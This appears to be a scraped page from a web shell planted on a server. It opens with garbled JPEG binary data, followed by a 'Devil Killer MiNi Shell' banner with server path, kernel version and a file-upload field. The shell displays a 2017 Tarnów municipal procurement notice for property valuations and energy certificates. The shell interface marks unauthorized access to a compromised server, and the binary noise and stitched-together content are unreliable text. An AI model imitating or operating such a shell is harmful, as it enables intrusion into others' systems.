JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170314/43355-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.malopolska.pl/umtarnow/' target='_blank'>http://bip.malopolska.pl/umtarnow/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 43355 - 2017
              z dnia 2017-03-14 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Tarnów: Wykonanie operatów szacunkowych określających wartość rynkową nieruchomości oraz świadectw charakterystyki energetycznej<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Miasta Tarnowa - Urząd Miasta Tarnowa - Wydział Gospodarowania Mieniem, krajowy numer identyfikacyjny
              64811000000, ul.
              ul. Nowa 
              3,
              33100  
              Tarnów, woj.
              małopolskie, państwo
              Polska, tel.
              146 882 762, e-mail
              m.jaszczur@umt.tarnow.pl, faks
              146 882 771.
              <br />
              Adres strony internetowej (URL): www.tarnow.pl, http://bip.malopolska.pl/umtarnow/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.malopolska.pl/umtarnow/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Adres pocztowy: Urząd Miasta Tarnowa, 33-100 Tarnów, ul. Nowa 4, parter sala 1 - Kancelaria Główna w Wydziale Organizacyjnym</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie operatów szacunkowych określających wartość rynkową nieruchomości oraz świadectw charakterystyki energetycznej<br /><b>Numer referencyjny: </b>WGM.271.05.2017/SA<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie nr 1
Wykonanie trzech operatów szacunkowych określających wartość rynkową niezabudowanych nieruchomości stanowiących własność Gminy Miasta Tarnowa przeznaczonych do zbycia w trybie przetargu ustnego ograniczonego na poprawienie warunków zagospodarowania nieruchomości przyległych. Wycena dotyczy nieruchomości oznaczonych jako:
1) działka nr 31/1 obrębu 5 o powierzchni 41 m2 położona przy ul. Klikowskiej w Tarnowie, objęta księgą wieczystą nr TR1T/00076042/5; poprawienie warunków zagospodarowania nieruchomości przyległej oznaczonej jako działka nr 31/3 obrębu 5 (własność prywatna - jeden właściciel),
2) działka nr 45/3 obrębu 5 o powierzchni 23 m2 położona przy ul. Klikowskiej w Tarnowie, objęta księgą wieczystą nr TR1T/00076047/0; poprawienie warunków zagospodarowania nieruchomości przyległej oznaczonej jako działki nr 43/2 obrębu 5 (własność prywatna - jeden właściciel) oraz nr 45/4 i 44/5 obrębu 5 (własność prywatna - jeden właściciel),
3) działka nr 32/1 obrębu 257 o powierzchni 697 m2 położona przy ul. Sióstr Służebniczek w Tarnowie, objęta księgą wieczystą nr TR1T/00078301/3; poprawienie warunków zagospodarowania nieruchomości przyległej oznaczonej jako działki nr 32/2 obrębu 257 (własność prywatna - dwóch współwłaścicieli w częściach ułamkowych) oraz nr 20/4 obrębu 257 (własność prywatna - jeden właściciel). Nakłady dokonane na nieruchomości przyległej przez jej właściciela nie podlegają wycenie.
Z wizji na nieruchomościach należy sporządzić stosowne protokoły.
Zadanie nr 2
Wykonanie siedmiu operatów szacunkowych określających wartości rynkowe nieruchomości gruntowych położonych w Tarnowie w celu ustalenia wysokości jednorazowej opłaty z tytułu wzrostu wartości nieruchomości spowodowanego uchwaleniem bądź zmianą miejscowego planu zagospodarowania przestrzennego na podst. art. 36 ust. 4 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778, z późn. zm.) dla wymienionych poniżej nieruchomości.
W sporządzonym operacie należy podać wyszczególnione wartości gruntu zgodnie z przeznaczeniem nieruchomości przed uchwaleniem miejscowego planu zagospodarowania przestrzennego i po jego uchwaleniu. Wycenie nie podlegają nakłady poniesione na wycenianych nieruchomościach. Przy wykonaniu wyceny należy dokonać oszacowania odrębnie dla każdego rodzaju przeznaczenia w miejscowym planie zagospodarowania przestrzennego oraz uwzględnić rysunek planu wraz z liniami zabudowy.
Wycena dotyczy następujących nieruchomości:
Lp.	Nr działki	Obręb	Powierzchnia [m2]	Nr księgi wieczystej
1	25/9	200	3202	Nr ksiąg wieczystych zostanie udostępniony Wykonawcy, którego oferta zostanie wybrana
2	124/15	200	486	
	124/16		225	
3	238/6	200	2847	
4	1/301	200	781	
5	255/6	200	2416	
6	236/4	200	1077	
	236/12		211	
7	1/94	200	257	
	1/95		529	
	1/294		218	
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.
Wykonawca zobowiązany jest do uczestniczenia w posiedzeniach Samorządowego Kolegium Odwoławczego w przypadku złożenia przez zbywcę nieruchomości odwołania od decyzji w sprawie ustalenia wysokości renty planistycznej z tytułu zbycia nieruchomości.
Zadanie nr 3
Wykonanie ośmiu operatów szacunkowych określających wartości rynkowe nieruchomości gruntowych położonych w Tarnowie w celu ustalenia wysokości jednorazowej opłaty z tytułu wzrostu wartości nieruchomości spowodowanego uchwaleniem bądź zmianą miejscowego planu zagospodarowania przestrzennego na podst. art. 36 ust. 4 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778, z późn. zm.) dla wymienionych poniżej nieruchomości.
W sporządzonym operacie należy podać wyszczególnione wartości gruntu zgodnie z przeznaczeniem nieruchomości przed uchwaleniem miejscowego planu zagospodarowania przestrzennego i po jego uchwaleniu. Wycenie nie podlegają nakłady poniesione na wycenianych nieruchomościach. Przy wykonaniu wyceny należy dokonać oszacowania odrębnie dla każdego rodzaju przeznaczenia w miejscowym planie zagospodarowania przestrzennego oraz uwzględnić rysunek planu wraz z liniami zabudowy.
Wycena dotyczy następujących nieruchomości:
Lp.	Nr działki	Obręb	Powierzchnia [m2]	Nr księgi wieczystej	Uwagi
1	226/19	172	242	Nr ksiąg wieczystych zostanie udostępniony Wykonawcy, którego oferta zostanie wybrana	
	227/1		1675		
	11/27		1485		
	11/29		402		
2	188/12	172	491		
	188/13		159		
3	228/4	172	3328		podział działki na 228/20, 228/21
4	8/13	172	1455		
5	238/6	172	900		
	238/7		900		
6	10/26	172	3008		
7	52	173	764		
8	16/8	173	1059		
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.
Wykonawca zobowiązany jest do uczestniczenia w posiedzeniach Samorządowego Kolegium Odwoławczego w przypadku złożenia przez zbywcę nieruchomości odwołania od decyzji w sprawie ustalenia wysokości renty planistycznej z tytułu zbycia nieruchomości.
Zadanie nr 4
Wykonanie siedmiu operatów szacunkowych określających wartości rynkowe nieruchomości gruntowych położonych w Tarnowie w celu ustalenia wysokości jednorazowej opłaty z tytułu wzrostu wartości nieruchomości spowodowanego uchwaleniem bądź zmianą miejscowego planu zagospodarowania przestrzennego na podst. art. 36 ust. 4 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778, z późn. zm.) dla wymienionych poniżej nieruchomości.
W sporządzonym operacie należy podać wyszczególnione wartości gruntu zgodnie z przeznaczeniem nieruchomości przed uchwaleniem miejscowego planu zagospodarowania przestrzennego i po jego uchwaleniu. Wycenie nie podlegają nakłady poniesione na wycenianych nieruchomościach. Przy wykonaniu wyceny należy dokonać oszacowania odrębnie dla każdego rodzaju przeznaczenia w miejscowym planie zagospodarowania przestrzennego oraz uwzględnić rysunek planu wraz z liniami zabudowy.
Wycena dotyczy następujących nieruchomości:
Lp.	Nr działki	Obręb	Powierzchnia [m2]	Nr księgi wieczystej	Uwagi
1	125	253	447	Nr ksiąg wieczystych zostanie udostępniony Wykonawcy, którego oferta zostanie wybrana	
2	10/19	147	131		
	10/18		258		
	10/22		125		
	5/17		58		
3	19/3	100	2759		
4	164	74	704		
5	346/21	199	2532		podział działki na 346/93, 346/94, 346/95
6	1/13	208	12531		
	1/14		3279		
	1/15		3903		
	1/17		5355		
7	367/2	109	883		
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.
Wykonawca zobowiązany jest do uczestniczenia w posiedzeniach Samorządowego Kolegium Odwoławczego w przypadku złożenia przez zbywcę nieruchomości odwołania od decyzji w sprawie ustalenia wysokości renty planistycznej z tytułu zbycia nieruchomości.
Zadanie nr 5
Wykonanie jednego operatu szacunkowego określającego wartość rynkową nieruchomości gruntowej położonej w Tarnowie oznaczonej jako działka nr 96/4 obrębu 199 o powierzchni 4190 m2 (po podziale obecnie działki nr 96/8 i 96/9 obrębu 199) w celu ustalenia wysokości jednorazowej opłaty z tytułu wzrostu wartości nieruchomości spowodowanego uchwaleniem bądź zmianą miejscowego planu zagospodarowania przestrzennego na podst. art. 36 ust. 4 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778, z późn. zm.).
W sporządzonym operacie należy podać wyszczególnione wartości gruntu zgodnie z przeznaczeniem nieruchomości przed uchwaleniem miejscowego planu zagospodarowania przestrzennego i po jego uchwaleniu. Wycenie nie podlegają nakłady poniesione na wycenianych nieruchomościach. Przy wykonaniu wyceny należy dokonać oszacowania odrębnie dla każdego rodzaju przeznaczenia w miejscowym planie zagospodarowania przestrzennego oraz uwzględnić rysunek planu wraz z liniami zabudowy.
Wycena dotyczy następujących nieruchomości:
Przy dokonywaniu wyceny należy uwzględnić następującą uwagę dotyczącą sposobu wyceny zawartą w decyzji Samorządowego Kolegium Odwoławczego (sygn. akt: SKO.ZP/415/268/2014 z dnia 16 grudnia 2014 r.): dokonanie wyceny poprzez dokonanie oszacowania odrębnie terenów komunikacji dróg publicznych (lokalnych i dojazdowych), odrębnie terenów oznaczonych symbolem PU i ewentualnie odrębnie terenów oznaczonych symbolem PP.
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Wykonawca zobowiązany jest do uczestniczenia w czynności zapoznawania stron z wartościami nieruchomości określonymi w operacie przez Wykonawcę i do udzielania ewentualnych wyjaśnień dotyczących treści tego operatu.
Wykonawca zobowiązany jest do uczestniczenia w posiedzeniach Samorządowego Kolegium Odwoławczego w przypadku złożenia przez zbywcę nieruchomości odwołania od decyzji w sprawie ustalenia wysokości renty planistycznej z tytułu zbycia nieruchomości.
Zadanie nr 6
Wykonanie:
1) dwudziestu dziewięciu operatów szacunkowych określających wartość lokali mieszkalnych w budynkach komunalnych z wyodrębnieniem wartości udziału oddanego w użytkowanie wieczyste działek przynależnych do budynku.
Wycenie podlegają również nakłady poniesione na dany lokal, pod warunkiem uzyskania pisemnej zgody od Miejskiego Zarządu Budynków Sp. z o.o. w Tarnowie na ich poniesienie przez najemcę mieszkania. 
W operacie szacunkowym należy określić wartość lokalu mieszkalnego, wartość nakładów, wartość prawa związanego z własnością lokalu mieszkalnego oraz wartość udziału w gruncie związanego z danym lokalem mieszkalnym. Wycena sporządzana w celu sprzedaży lokali mieszkalnych na rzecz najemców wraz z własnością gruntu związanej z danym lokalem mieszkalnym,
2) dwudziestu dziewięciu świadectw charakterystyki energetycznej dla lokali mieszkalnych w budynkach komunalnych.
Wykaz lokali mieszkalnych podlegających wycenie, które wymagają sporządzenia świadectw charakterystyki energetycznej:
Lp.	Adres - ulica	Nr lokalu	Użytkowanie wieczyste/ Sprzedaż użytkowania wieczystego/ Własność gruntu
1.	Sportowa 10	7	Sprzedaż użytkowania wieczystego
2.	Ogrodowa 10	12	Sprzedaż użytkowania wieczystego
3.	Os. 25-Lecia PRL 6	24	Użytkowanie wieczyste
4.	Pułaskiego 91B	40	Użytkowanie wieczyste
5.	Szczepanika 2	58	Użytkowanie wieczyste
6.	Pułaskiego 81	105	Użytkowanie wieczyste
7.	Lwowska 61	130	Użytkowanie wieczyste
8.	Mościckiego 48	13	Użytkowanie wieczyste
9.	Pracy 4	37	Użytkowanie wieczyste
10.	Os. 25-Lecia PRL 4	22	Użytkowanie wieczyste
11.	Lwowska 42	25	Własność gruntu
12.	Skowronków 6A	76	Użytkowanie wieczyste
13.	Lelewela 3	43	Użytkowanie wieczyste
14.	Lelewela 3	15	Użytkowanie wieczyste
15.	Elektryczna 55	3	Użytkowanie wieczyste
16.	Parkowa 29	23	Użytkowanie wieczyste
17.	Pracy 4A	12	Użytkowanie wieczyste
18.	Lwowska 69	2	Użytkowanie wieczyste
19.	Os. 25-Lecia PRL 3	32	Użytkowanie wieczyste
20.	Krakowska 42	14	Użytkowanie wieczyste
21.	Mościckiego 48	4	Użytkowanie wieczyste
22.	Skowronków 6A	37	Użytkowanie wieczyste
23.	Skowronków 6A	48	Użytkowanie wieczyste
24.	Kołłątaja 15	18	Użytkowanie wieczyste
25.	Wieniawskiego 8	13	Użytkowanie wieczyste
26.	3 Maja 3	23	Użytkowanie wieczyste
27.	Pułaskiego 97	9	Użytkowanie wieczyste
28.	Krakowska 20	6A	Użytkowanie wieczyste
29.	Kołłątaja 15A	18	Użytkowanie wieczyste
Wizji na nieruchomości należy dokonać po uprzednim poinformowaniu o jej terminie najemcy lokalu.
Z wizji na nieruchomości należy sporządzić stosowny protokół.
Zadanie nr 7
Wykonanie jednego operatu szacunkowego określającego wartość rynkową zabudowanej parterowym domem drewnianym na podmurówce o powierzchni użytkowej 42 m2 oraz murowanym budynkiem gospodarczym o powierzchni użytkowej 19 m2, nieruchomości stanowiącej własność Gminy Miasta Tarnowa oznaczonej jako działka nr 31/2 obrębu 5 o powierzchni 109 m2 położonej przy ul. Klikowskiej w Tarnowie, objętej księgą wieczystą nr TR1T/00076042/5. Wyceniana nieruchomość przeznaczona jest do zbycia w trybie przetargu ustnego ograniczonego na poprawienie warunków zagospodarowania nieruchomości przyległych oznaczonych jako działki: nr 31/3 obrębu 5 (własność prywatna - jeden właściciel) oraz nr 32 obrębu 5 (własność prywatna - jeden właściciel). Wycenie podlega cała nieruchomość - grunt wraz zabudowaniami.
Z wizji na nieruchomościach należy sporządzić stosowne protokoły.
Zadanie nr 8
Wykonanie jednego operatu szacunkowego określającego wartość prawa użytkowania wieczystego gruntu niezabudowanej nieruchomości stanowiącej własność Skarbu Państwa oddanej w użytkowanie wieczyste Gminie Miasta Tarnowa, oznaczonej jako działka nr 155/6 obrębu 199 o powierzchni 2362 m2 położonej w rejonie ul. Kochanowskiego w Tarnowie, objętej księgą wieczystą nr TR1T/00027290/0. Na przedmiotowej działce zlokalizowane są dwa słupy wysokiego napięcia. Wycenie podlega sam grunt.
Przedmiotowa nieruchomość położona jest w terenie objętym miejscowym planem zagospodarowania przestrzennego, w którym oznaczona jest symbolem 3.PP - teren zabudowy techniczno-produkcyjnej.
Wycena jest dokonywana w celu zbycia prawa wieczystego użytkowania, jako jeden kompleks wraz z nieruchomością oznaczoną jako działka nr 355/1 obrębu 199, dla której w 2016 r. został wykonany operat szacunkowy określający wartość prawa wieczystego użytkowania.
Z wizji na nieruchomościach należy sporządzić stosowne protokoły.
Zadanie nr 9
Wykonanie jednego operatu szacunkowego określającego wartość rynkową niezabudowanej nieruchomości stanowiącej własność Gminy Miasta Tarnowa oznaczonej jako działka nr 86/11 obrębu 78 o powierzchni 918 m2 położonej przy ul. Krzyskiej w Tarnowie, objętej księgą wieczystą nr TR1T/00142908/8. Na terenie obejmującym przedmiotową nieruchomość brak jest miejscowego planu zagospodarowania przestrzennego, dla nieruchomości tej wydano natomiast dwie decyzje o warunkach zabudowy i zagospodarowania terenu na budowę:
- budynku handlowo-usługowego (usługi podstawowe) dla działki nr 86/11 obrębu 78,
- budynku mieszkalnego jednorodzinnego wolnostojącego na terenie działki nr 86/5 obrębu 78 (z której to działki została wydzielona działka 86/11) wraz z budową wjazdu na terenie obejmującym działki nr 86/5 i 86/3 obrębu 78.
Wyceniana nieruchomość przeznaczona jest do zbycia w trybie przetargu ustnego nieograniczonego.
Z wizji na nieruchomościach należy sporządzić stosowne protokoły.
Zadanie nr 10
Wykonanie jednego operatu szacunkowego określającego wartość niezabudowanych nieruchomości, wykonywanego w celu zamiany tych nieruchomości i dotyczącego:
1) nieruchomości stanowiących własność prywatną położonych w Tarnowie w obrębie ewidencyjnym 107 oznaczonych jako działki: 10/5 o powierzchni 181 m2, 9/4 o powierzchni 335 m2, 162/8 o powierzchni 54 m2, 74/2 o powierzchni 781 m2, 75/2 o powierzchni 745 m2, 77/2 o powierzchni 394 m2,
2) nieruchomości stanowiącej własność Gminy Miasta Tarnowa oznaczonej jako działka nr 99/4 obrębu 66 o powierzchni 4956 m2 objętej księgą wieczystą nr TR1T/00027172/7, na której zlokalizowane są tory kolejowe i oświetlenie nie podlegające wycenie - wycenie podlega sam grunt nieruchomości, a także wartość ustanawianej na czas nieokreślony służebności przejazdu torami kolejowym zlokalizowanymi na tej nieruchomości na rzecz każdoczesnego właściciela lub użytkownika nieruchomości objętej księgą wieczystą  TR1T/00027081/2 stanowiącej działki nr 94/2, 99/11 i 99/12 obrębu 66.
Na terenach obejmujących wyceniane nieruchomości brak jest miejscowego planu zagospodarowania przestrzennego.
Wycenie podlegają nieruchomości przeznaczone do zamiany oraz ustanawiana na jednej z nich służebność przejazdu. 
Wizji na nieruchomości należy dokonać po uprzednim poinformowaniu o jej terminie właściciela. Z wizji na nieruchomości należy sporządzić stosowny protokół.
Zadanie nr 11
Wykonanie jednego operatu szacunkowego określającego wartość rynkową prawa własności lokalu użytkowego wraz z udziałem w prawie własności działek i częściach wspólnych budynku nie służących do użytku właścicieli poszczególnych lokali, stanowiącego własność osoby prywatnej. Wycena dotyczy lokalu użytkowego nr 3 o powierzchni 97,95 m2 zlokalizowanego w piwnicy budynku o adresie ul. Urszulańska 18 na działce nr 69 obrębu 252 w Tarnowie.
Budynek, w którym położony jest lokal będący przedmiotem wyceny, jest czterokondygnacyjny, w całości podpiwniczony o powierzchni użytkowej 1 420,09 m2, wielorodzinny z częścią usługową, 1-klatkowy, o konstrukcji murowanej tradycyjnej, pokryty dachem dwuspadowym o konstrukcji drewnianej z poddaszem użytkowym. Dla budynku został sporządzony projekt podziału fizycznego z wydzieleniem 13 lokali mieszkalnych i 3 lokali użytkowych. 
Z prawem własności wycenianego lokalu związany jest udział wynoszący 9795/130387 części w  częściach wspólnych budynku nie służących do użytku właścicieli poszczególnych lokali i w prawie własności działki nr 69 o powierzchni 729 m2 obrębu 252.
Wycena dokonywana jest w celu nabycia lokalu.
